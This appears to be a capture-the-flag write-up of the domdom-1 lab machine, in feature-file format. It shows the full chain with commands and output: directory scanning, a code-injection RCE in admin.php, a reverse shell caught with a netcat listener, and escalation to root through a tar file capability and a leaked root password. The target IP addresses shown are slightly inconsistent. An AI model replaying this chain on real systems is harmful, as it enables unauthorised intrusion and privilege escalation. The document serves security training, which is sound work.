## Version 1.4.1
## language: en

Feature:
  TOE:
    domdom-1
  Category:
    Remote Code Execution
  Location:
    http://192.168.0.8:80/admin.php
  CWE:
    CWE-94: Improper Control of Generation of Code ('Code Injection')
  Rule:
    REQ.043: https://fluidattacks.com/web/rules/043/
  Goal:
    Get shell and privilege escalation
  Recommendation:
    Not letting a user decide the name and extensions of the files
    Or that you can upload or create files in the web application

  Background:
  Hacker Software:
    | <Software name>               | <Version> |
    | Kali Linux                    |  2020.3   |
    | Nmap                          |  7.80     |
    | VirtualBox                    |  6.1      |
    | Firefox                       |  79.0     |
    | dirb                          |  2.22     |
    | OpenSSL                       |  1.1.1.g  |
    | Burp Suite Community Edition  |  2020.6   |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on Virtualbox
    And I realize that a user is required to log in [evidences](01.png)
    Then I proceed to make a scan with nmap on my network with the command
    """
    kali@kali:~$ nmap -sn 192.168.0.1/24

    Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-07 09:19 EST
    Nmap scan report for csp1.zte.com.cn (192.168.0.1)
    Host is up (0.0038s latency).
    Nmap scan report for ubuntu (192.168.0.8)
    Host is up (0.0015s latency).
    Nmap scan report for kali (192.168.0.9)
    Host is up (0.00013s latency).
    Nmap done: 256 IP addresses (3 hosts up) scanned in 9.88 seconds
    """
    Then I determined that the ip of the machine is 192.168.0.8

  Scenario: Normal use case
    Given I access the site http://192.168.0.6:80/
    And the Rashomon IPS homepage is displayed [evidences](02.png)

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given the website does not show any vulnerabilities with the naked eye
    Then I proceeded to parse with dirb the directories on the server
    """
    kali@kali:~$ dirb http://192.168.0.8

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------

    START_TIME: Thu Jan  7 09:28:16 2021
    URL_BASE: http://192.168.0.8/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

    -----------------

    GENERATED WORDS: 4612
    ---- Scanning URL: http://192.168.0.8/ ----
    + http://192.168.0.8/admin.php (CODE:200|SIZE:329)
    + http://192.168.0.8/index.php (CODE:200|SIZE:694)
    + http://192.168.0.8/server-status (CODE:403|SIZE:299)

    -----------------
    END_TIME: Thu Jan  7 09:28:22 2021
    DOWNLOADED: 4612 - FOUND: 3
    """
    Given the results I access the path /admin.php [evidences](03.png)
    When I fill in the form, no results are obtained
    Then I use the burpsuite and modify the POST request [evidences](04.png)
    And loads a form with a possible vulnerability to RCE [evidences](05.png)
    Then I send a command to confirm the vulnerability [evidences](06.png)
    And the Remote Code Execution vulnerability is confirmed

  Scenario: Exploitation
    Given the site is vulnerable to Remote Code Execution
    Then I charge a reverse script php [evidences](07.png)
    And I use nc to listen to port 1234
    """
    nc -lvp 1234

    listening on [any] 1234 ...
    connect to [192.168.0.9] from ubuntu [192.168.0.15] 47144
    Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016
    09:00:44 up 26 min,  0 users,  load average: 0.00, 0.01, 0.05
    USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
    uid=33(www-data) gid=33(www-data) groups=33(www-data),27(sudo)
    /bin/sh: 0: can't access tty; job control turned off
    $ whoami
    www-data
    """
    Given the lack of permissions, it seeks to scale privileges
    Then the getcap command is used to list the programs and their shells
    """
    $ getcap -r / 2>/dev/null
    /usr/bin/mtr = cap_net_raw+ep
    /usr/bin/arping = cap_net_raw+ep
    /usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
    /usr/bin/traceroute6.iputils = cap_net_raw+ep
    /usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
    /usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper
    /bin/tar = cap_dac_read_search+ep
    """
    Then you look for some vulnerable file with root permissions
    """
    $ cd /tmp
    $ ls
    php-revshell.php
    systemd-private-1fda688d9add474585b535d27852425a-colord.service-Hsdin9
    systemd-private-1fda688d9add474585b535d27852425a-rtkit-daemon.service-nb4JU
    systemd-private-1fda688d9add474585b535d27852425a-systemd-timesyncd.service
    $ tar -xvf readme.tar
    home/domom/Desktop/README.md
    $ ls
    home
    php-revshell.php
    readme.tar
    systemd-private-1fda688d9add474585b535d27852425a-colord.service-Hsdin9
    systemd-private-1fda688d9add474585b535d27852425a-rtkit-daemon.service-nb4JU
    systemd-private-1fda688d9add474585b535d27852425a-systemd-timesyncd.service
    """
    Given the file was unzipped
    Then the file and its contents are reviewed
    """
    $ cd home
    $ cd domom
    $ cd Desktop
    $ ls
    README.md
    cat README.md
    Hi Dom, This is the root password:

    Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a
    """
    Given the results I watch the key for the root user
    Then the vulnerability it is used Interactive Terminal Spawned via Python
    And starts session by to validate the contents of the root folder
    """
    $ python3 -c 'import pty;pty.spawn("/bin/bash")'
    To run a command as administrator (user "root"), use "sudo <command>".
    See "man sudo_root" for details.

    www-data@ubuntu:/tmp/home/domom/Desktop$ su root
    su root
    Password: Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a

    root@ubuntu:/tmp/home/domom/Desktop# cd /root
    cd /root
    root@ubuntu:~# ls
    ls
    Ry{}LJRBS5nc+*V.#a
    root@ubuntu:~# id
    id
    uid=0(root) gid=0(root) groups=0(root)
    """

  Scenario: Remediation
    Given The website is vulnerable Remote Code Execution
    Then avoid using user input inside evaluated code
    And not use functions such as eval at all

  Scenario: Scoring
   Severity scoring according to CVSSv3 standard
   Base: Attributes that are constants over time and organizations
     10/10 (high) - AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
   Temporal: Attributes that measure the exploit's popularity and fixability
     7/10 (high) - E:H/RL:O/RC:C
   Environmental: Unique and relevant attributes to a specific user environment
     7.8/10 (High) - CR:H/IR:H/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2021-01-08
